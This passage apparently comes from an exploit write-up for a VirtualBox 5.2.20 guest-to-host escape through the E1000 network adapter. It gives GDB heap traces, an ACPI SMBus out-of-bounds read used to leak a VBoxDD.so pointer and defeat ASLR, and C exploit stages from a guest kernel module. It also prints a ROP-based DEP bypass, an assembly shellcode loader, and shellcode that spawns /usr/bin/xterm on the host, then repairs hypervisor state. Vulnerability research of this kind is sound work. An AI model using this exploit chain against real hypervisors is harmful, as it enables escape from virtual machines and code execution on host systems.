            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

I traced this code under GDB using a script and got something like this:


[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8
[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8
...
[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0
[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848
[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728
[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570
[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90
[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

We are interested in device number 0xE, which corresponds to the E1000. The second list shows that the device following the E1000 lies 0x5700 bytes after it, the next one another 0x19E0 bytes further, and so on. As mentioned above, these distances are always the same, which opens up a wealth of possibilities for exploitation.
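To make the arithmetic concrete, here is a small sketch that sums the distances from the trace above. The absolute addresses come from this one run and will differ under ASLR; only the differences are expected to stay constant. The names `k_instance` and `distance_between` are made up for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Devices 0xe..0x11 from the "Instances" list in the trace above. */
enum { DEV_E1000, DEV_AC97, DEV_OHCI, DEV_ACPI, DEV_COUNT };

static const uint64_t k_instance[DEV_COUNT] = {
    0x7fc470083400ULL, /* #0xe  E1000 */
    0x7fc470088b00ULL, /* #0xf  next device after E1000 */
    0x7fc47008a4e0ULL, /* #0x10 OHCI */
    0x7fc47008be70ULL, /* #0x11 ACPI */
};

/* Distance in bytes between two device instances (from <= to). */
static uint64_t distance_between(size_t from, size_t to)
{
    assert(from < DEV_COUNT && to < DEV_COUNT && from <= to);
    return k_instance[to] - k_instance[from];
}
```

With these numbers, `distance_between(DEV_E1000, DEV_ACPI)` is 0x5700 + 0x19E0 + 0x1990 = 0x8A70, the distance from the E1000 instance to the ACPI instance.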


After the E1000, we have the following devices in ascending order of addresses: ICH AC'97, OHCI, ACPI, VirtualBox GIM. Studying the data structures of these devices, I found an excellent target for our write primitive.


When the virtual machine starts, an ACPI device is created (file src/VBox/Devices/PC/DevACPI.cpp):


typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

A handler for I/O ports in the range 0x4100-0x410F is registered for it. For port 0x4107, we have the following code:


PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

When the guest OS executes the INB processor instruction with an argument of 0x4107 to read one byte from the port, the handler takes a byte from the au8SMBusBlkDat[32] array at index u8SMBusBlkIdx and returns it to the guest. This is where the write primitive becomes useful: since the distance between the heap blocks of virtual devices does not change, the distance from the EEPROM93C46.m_au16Data array to the ACPIState.u8SMBusBlkIdx field is fixed. By writing two bytes at ACPIState.u8SMBusBlkIdx, we can read arbitrary bytes within 255 bytes of the start of ACPIState.au8SMBusBlkDat.
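The handler logic can be modelled outside VirtualBox to see what a corrupted index does. This is only a sketch: `FakeAcpi` is a hypothetical stand-in with a flat byte array instead of the real ACPIState layout, so that "out of bounds" reads stay inside the model.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { BLKDAT_SIZE = 32, MEM_SIZE = 512 };

/* Hypothetical model: mem[0..31] plays the role of au8SMBusBlkDat,
 * the rest of mem[] plays the role of whatever follows it in memory. */
typedef struct {
    uint8_t mem[MEM_SIZE];
    uint8_t blk_idx;          /* plays the role of u8SMBusBlkIdx */
} FakeAcpi;

/* Same three steps as the SMBBLKDAT_OFF case: read, increment, mask. */
static uint8_t fake_smbus_read(FakeAcpi *s)
{
    assert(sizeof(s->mem) > UINT8_MAX);   /* any 8-bit index stays inside the model */
    uint8_t value = s->mem[s->blk_idx];   /* index is used before it is masked */
    s->blk_idx++;
    s->blk_idx &= BLKDAT_SIZE - 1;
    return value;
}

/* What the write primitive achieves: plant an index, then read once. */
static uint8_t fake_leak_at(FakeAcpi *s, uint8_t planted_idx)
{
    s->blk_idx = planted_idx;
    return fake_smbus_read(s);
}
```

Note that the mask is applied only after the read. A planted index of 0x80 is used as is, but the handler then resets the index to 0x01, so each out-of-bounds byte needs the index to be planted again.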


There is a catch, though. If you look at the ACPIState structure, you can see that the array is almost at the end of the structure, followed only by the u8SMBusBlkIdx field and several other fields that are completely useless to us. So we can read from the ACPIState structure, but there is nothing interesting in it. Well, that does not stop us, so let's see what lies in memory beyond the structure.


gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0: 0xffffe98100000090  0xfffd9b2000000000
0x7fc47008d4f0: 0x00007fc470067a00  0x00007fc470067a00
0x7fc47008d500: 0x00000000a0028a00  0x00000000000e0000
0x7fc47008d510: 0x00000000000e0fff  0x0000000000001000
0x7fc47008d520: 0x000000ff00000002  0x0000100000000000
0x7fc47008d530: 0x00007fc47008c358  0x00007fc44d6ecdc6
0x7fc47008d540: 0x0031000035944000  0x00000000000002b8
0x7fc47008d550: 0x00280001d3878000  0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6: "ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

It turns out that at offset 0x58 from the end of the ACPIState structure there is a pointer to a string located at a fixed RVA from the base of VBoxDD.so. If we read this pointer using the primitives and subtract a constant from it, we get the base address of VBoxDD.so and thus bypass ASLR. The only thing we have to hope for is that the memory beyond the ACPIState structure does not differ each time the virtual machine starts. Fortunately, it turned out that the right pointer is always at offset 0x58 from the end of ACPIState.
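The numbers in the gdb session can be checked with a few lines of arithmetic. The sketch below uses only values visible above (instance address, data size, the 0x100 offset from the gdb expression, the 0x58 offset and the RVA); the macro and function names are my own.

```c
#include <assert.h>
#include <stdint.h>

#define ACPI_INSTANCE     0x7fc47008be70ULL /* "Instance" of acpi in the trace */
#define INSTANCE_DATA_OFF 0x100ULL          /* offset used in the gdb expression */
#define ACPI_STATE_SIZE   0x1570ULL         /* "Data size" of acpi in the trace */
#define PTR_OFF_PAST_END  0x58ULL           /* pointer position past the structure */
#define LEAKED_RVA        0x1f9dc6ULL       /* $2 in the gdb session */

/* Address of the pointer to "ACPI RSDP" in this particular run. */
static uint64_t leaked_ptr_address(void)
{
    return ACPI_INSTANCE + INSTANCE_DATA_OFF + ACPI_STATE_SIZE + PTR_OFF_PAST_END;
}

/* Base of VBoxDD.so recovered from the leaked pointer value. */
static uint64_t vboxdd_base_from(uint64_t leaked_ptr)
{
    assert(leaked_ptr >= LEAKED_RVA);
    return leaked_ptr - LEAKED_RVA;
}
```

For this run the pointer sits at 0x7fc47008d538, and subtracting the RVA from its value 0x7fc44d6ecdc6 gives 0x7fc44d4f3000, which matches the first mapping shown by vmmap.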


Information leak


Now we combine the two primitives we have built and use them to bypass ASLR. We overflow the heap, overwriting the EEPROM93C46 structure, then trigger the EEPROM code to write the index into the ACPIState structure, and then execute INB(0x4107) in the guest to access the ACPI device and read one byte of the pointer. All this is repeated eight times, each time increasing the index by one.


uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");
    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);
    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();
        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }
    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);
    return vboxdd_base;
}
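The cast `*(uint64_t*)leaked_bytes` above relies on the guest being little-endian, which holds on x86-64. As a sketch of the same step written out explicitly, the helper below assembles the eight bytes by hand. The page-alignment check is an extra sanity test I am adding for illustration; it is not part of the original exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Combine 8 leaked bytes, least significant byte first. */
static uint64_t assemble_le64(const uint8_t bytes[8])
{
    assert(bytes != NULL);
    uint64_t value = 0;
    for (size_t i = 0; i < 8; i++)
        value |= (uint64_t)bytes[i] << (8 * i);
    return value;
}

/* A plausible image base is page aligned (low 12 bits are zero). */
static int looks_like_image_base(uint64_t base)
{
    return (base & 0xfffULL) == 0;
}
```

With the pointer from the gdb dump, the leaked bytes would arrive as c6 cd 6e 4d c4 7f 00 00, and subtracting 0x1f9dc6 from the assembled value yields a page-aligned base.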

As mentioned earlier, to keep the integer underflow from also overflowing the stack buffer, the E1000 registers must be configured in a particular way. The point is that the stack buffer overflows in the e1kHandleRxPacket function, which is called while processing Tx descriptors only when loopback mode is on. This makes sense: in loopback mode the guest sends packets to itself, so they are received immediately after being sent. We disable this mode, so the e1kHandleRxPacket function becomes unreachable.
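The article does not show the bodies of e1000_enable_loopback_mode and e1000_disable_loopback_mode. As a rough sketch only, and assuming the Intel 8254x register layout in which the loopback mode field (LBM) occupies bits 7:6 of the receive control register RCTL, toggling loopback comes down to bit manipulation like the following. The helpers operate on a plain value, not on real MMIO, and their names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: RCTL.LBM is bits 7:6; 00b = no loopback, 11b = loopback. */
#define RCTL_LBM_MASK UINT32_C(0x000000C0)

/* Return the RCTL value with the loopback field set or cleared. */
static uint32_t rctl_with_loopback(uint32_t rctl, int enable)
{
    rctl &= ~RCTL_LBM_MASK;
    if (enable)
        rctl |= RCTL_LBM_MASK;
    return rctl;
}

/* True when both LBM bits are set. */
static int rctl_loopback_enabled(uint32_t rctl)
{
    return (rctl & RCTL_LBM_MASK) == RCTL_LBM_MASK;
}
```

A real guest driver would read RCTL from the mapped MMIO region, apply such a helper and write the result back; which exact value the original exploit writes is not stated in the text.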


DEP bypass


We have bypassed ASLR. Now we can enable loopback mode and trigger the stack buffer overflow vulnerability.


void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);
    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);
    free_buffer(buffer_va);
}
void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");
    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

Now, when control reaches the last instruction of the e1kHandleRxPacket function, the return address on the stack has been overwritten, so control is transferred wherever we want. But DEP is still in place. The classic approach applies here: build a chain of ROP gadgets that allocates executable memory, copies the shellcode loader into it and calls it.


Shellcode


The shellcode loader is extremely simple. It copies the beginning of the buffer that caused the overflow and places it right after itself. The end of that buffer holds the addresses and data for the ROP gadgets, and the beginning holds the shellcode itself.


use64
start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop
payload:
    ; The shellcode goes here
loader_size = $ - start

Now the shellcode gets control. Here is its first half:


use64
start:
    ; sys_vfork (58 on x86-64 Linux; plain sys_fork is 57)
    mov rax, 58
    syscall
    test rax, rax
    jnz continue_process_execution
    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi
    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi
    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall
...
cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

It forks and calls execve, which creates a new /usr/bin/xterm process. The attacker gains control of the host in the context of ring 3.
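For readers less used to raw syscalls, the same pattern looks like this in C. It is a sketch using the libc wrappers `fork` and `execve` rather than the raw syscall numbers used by the shellcode; `spawn_detached` is a name made up for this example.

```c
#include <assert.h>
#include <sys/types.h>
#include <unistd.h>

/* Start `path` in a child process and return immediately in the parent.
 * Returns the child's pid, or -1 if the fork failed. */
static pid_t spawn_detached(const char *path, char *const argv[],
                            char *const envp[])
{
    assert(path != NULL);
    pid_t pid = fork();
    if (pid == 0) {
        execve(path, argv, envp);  /* only returns on failure */
        _exit(127);
    }
    return pid;                    /* parent: continue_process_execution */
}
```

In the shellcode the parent branch corresponds to the jump to continue_process_execution, while the child replaces itself with the program named in cmd.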


Process Continuation


I believe that every exploit should be finished properly. This means it should not crash the target program, although clearly that is not always possible. We need the virtual machine to keep running, and the second half of the shellcode takes care of that.


continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48
    ; Skip junk
    add rsp, 0x10
    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15
    ; Skip junk
    add rsp, 0x8
    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL
    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb
    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0
    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted
    ret

The point is that when the buffer on the stack overflowed, we overwrote a lot of data that the hypervisor needs in order to keep working after returning from the e1kHandleRxPacket function. Since it is neither feasible nor worthwhile to reconstruct all the data overwritten by the ROP gadgets, we do what is usually done: jump up several frames and continue execution as if all the called functions had already completed.
Schematically, the call stack when returning from e1kHandleRxPacket looks like this:


#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

From the shellcode, we jump directly into e1kR3NetworkDown_XmitPending, which has nothing left to do and returns control to the hypervisor function that called it:


static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

The shellcode sets RBP to RSP + 0x48 so that it has the value it should have in the e1kR3NetworkDown_XmitPending function. Next, the RBX, R12, R13, R14 and R15 registers are popped from the stack, because under the System V ABI they are callee-saved: every called function must preserve them. If this is not done, the hypervisor will crash because of invalid pointers in these registers.


We could stop here: the virtual machine no longer crashes and continues to work normally. But if you try to shut it down, you get an access violation in PDMR3QueueDestroyDevice. The reason is that when the heap overflowed, we overwrote the important PDMQUEUE data structure; specifically, it is overwritten by the last two ROP gadget entries, i.e. the last 16 bytes of the buffer. At first I tried unsuccessfully to reduce the size of the ROP chain, but then I filled in the correct data manually in the debugger and still got a crash. This means the error cannot be fixed that easily.


The data structure being freed is a linked list. The overflow overwrites data in the second-to-last element of the list, corrupting its pointer to the last element. The idea for the fix was simple:


; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

With the last two elements removed from the list, the virtual machine can shut down safely.
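The same repair can be sketched in C on a toy list. `FakeQueue` is a hypothetical stand-in and not the real PDMQUEUE layout; the function mirrors the two stores in the shellcode: zero the node reached through the first element's next pointer, then clear that pointer.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy node: only a next pointer and a name, unlike the real PDMQUEUE. */
typedef struct FakeQueue {
    struct FakeQueue *next;
    char name[16];
} FakeQueue;

/* Cut the list right after `head`, wiping the node it pointed to. */
static void truncate_after_head(FakeQueue *head)
{
    assert(head != NULL);
    if (head->next != NULL)
        memset(head->next, 0, sizeof(*head->next)); /* shellcode: rep stosb, 0xA0 bytes */
    head->next = NULL;                              /* shellcode: mov qword [rbx], 0 */
}

/* Number of nodes reachable from `q`. */
static size_t list_length(const FakeQueue *q)
{
    size_t n = 0;
    for (; q != NULL; q = q->next)
        n++;
    return n;
}
```

After truncation, any code that walks the list on shutdown only ever sees the first element, so the corrupted nodes are never dereferenced.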


Demo